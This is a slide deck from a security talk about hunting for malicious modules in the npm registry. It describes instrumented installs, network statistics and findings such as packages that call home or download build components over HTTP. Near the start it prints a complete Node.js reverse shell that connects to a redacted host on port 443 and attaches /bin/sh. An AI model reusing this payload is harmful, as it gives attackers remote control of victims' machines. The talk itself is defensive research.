Hunting for malicious modules in npm - NodeSummit

Posted on 28-Jan-2018



Hunting for Malicious Modules in npm

adam_baldwin / evilpacket

liftsecurity.io

nodesecurity.io: Continuous Security Monitoring

WHY SHOULD WE HUNT?

🕯 Hey, I can publish malicious code to npm

💨 this is bad.

🔥 install scripts are BAD!

💩 JavaScript BAD!

rimrafall

npm hydra worm

WHAT ARE WE HUNTING?

WHAT DEFINES MALICIOUS BEHAVIOR?

    var net = require('net');
    var daemon = require('daemon');
    var spawn = require('child_process').spawn;

    function c() {
      var client = new net.Socket();
      // outbound connection on 443 to a host the slide redacts; a shell is attached to the socket
      client.connect(443, "REDACTED", function() {
        var sh = spawn('/bin/sh', []);
        client.write("Connected\r\n");
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
      });
      client.on('error', function() {});
      // reconnects five seconds after the connection drops
      client.on('close', function() { setTimeout(c, 5000); });
    }

    daemon();
    c();

😈 Example (lines highlighted on the slide):

    client.connect(443, "REDACTED", function() {
      var sh = spawn('/bin/sh', []);

WHERE ARE WE HUNTING?

507,573 modules

3,443,784 individual versions

242,505,822 individual files

21,756 modules with install scripts

HOW AM I HUNTING?

MIRROR REGISTRY

INDEX MODULES: filenames, extensions, content hash

npm install module -> syscall capture -> DB

npm publish -> GCS -> PubSub -> Instrumentation (npm i) -> raw data 🎉

~24,000 modules processed

2.1 TB OF DATA 😲

DESTINATION PORTS

22 53 80 443 1880 3000 3001 3306 4987 6379 8000 8002 8008 8043 8080 8090 9000 9001 9418 23400 27017 38584 54329 61337

DNS REQUESTS

339 unique lookups

DESTINATION HOSTS

1080 unique hosts

RESULTS 😈

Insecure Behavior

144+ modules that download build components over HTTP

Modules that called home

et_phone_home, anarchy, harmlesspackage, botbait

Modules that change registry settings

😇 ? 😈

😢 / 😀

WHAT DID I LEARN?

How can we improve the future?

People will publish malicious things to the registry

Your security habits have a lot to do with whether this gets exploited or not

- Have good passwords
- Don't publish credentials
- Limit the # of publishers

But what about ? Can't they do something?

</presentation>

Thanks

adam_baldwin / evilpacket